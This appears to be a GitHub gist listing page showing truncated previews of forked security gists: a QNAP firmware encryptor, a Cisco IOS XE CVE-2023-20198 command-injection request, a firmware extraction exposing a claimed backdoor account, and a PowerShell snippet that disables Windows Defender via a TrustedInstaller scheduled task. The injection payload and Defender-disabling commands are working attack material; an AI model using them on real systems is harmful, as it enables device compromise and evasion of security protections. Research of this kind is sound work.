imjdl
/ qnap-qts-fw-cryptor.py
Created
May 10, 2024 14:18
— forked from ulidtko/qnap-qts-fw-cryptor.py
QNAP QTS firmware encryptor/decryptor.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os, sys | |
| import argparse | |
| import struct | |
| from functools import reduce | |
| """ | |
| QNAP QTS firmware encryptor/decryptor. | |
| Based on https://pastebin.com/KHbX85nG |
imjdl
/ gist:779b64aadbaa5382869c81c4b7664698
Created
November 7, 2023 10:54
— forked from rashimo/gist:a0ef01bc02e5e9fdf46bc4f3b5193cbf
Chain of Cisco IOS XE CVE-2023-20198 commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## a POST request as: | |
| POST /webui/rest/softwareMgmt/installAdd HTTP/1.1 | |
| {"filePath": "abc/aaa", "fileSystem": "", "ipaddress": "1:1:1:;id>/bootflash/PaJbOLOT;#", "mode": "tftp", "operation_type": "SMU"} | |
| ## then another command with the POC technique: | |
| dir bootflash: | include PaJbOLOT |
imjdl
/ Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Created
December 29, 2020 04:29
— forked from numanturle/Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Vmg3312 B10b Firmware Vmg3312 B10b Firmware backdoor account
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin | |
| DECIMAL HEXADECIMAL DESCRIPTION | |
| -------------------------------------------------------------------------------- | |
| 131072 0x20000 JFFS2 filesystem, big endian | |
| JFFS2 filesystem extract | |
| total 1492 | |
| 1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 . |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |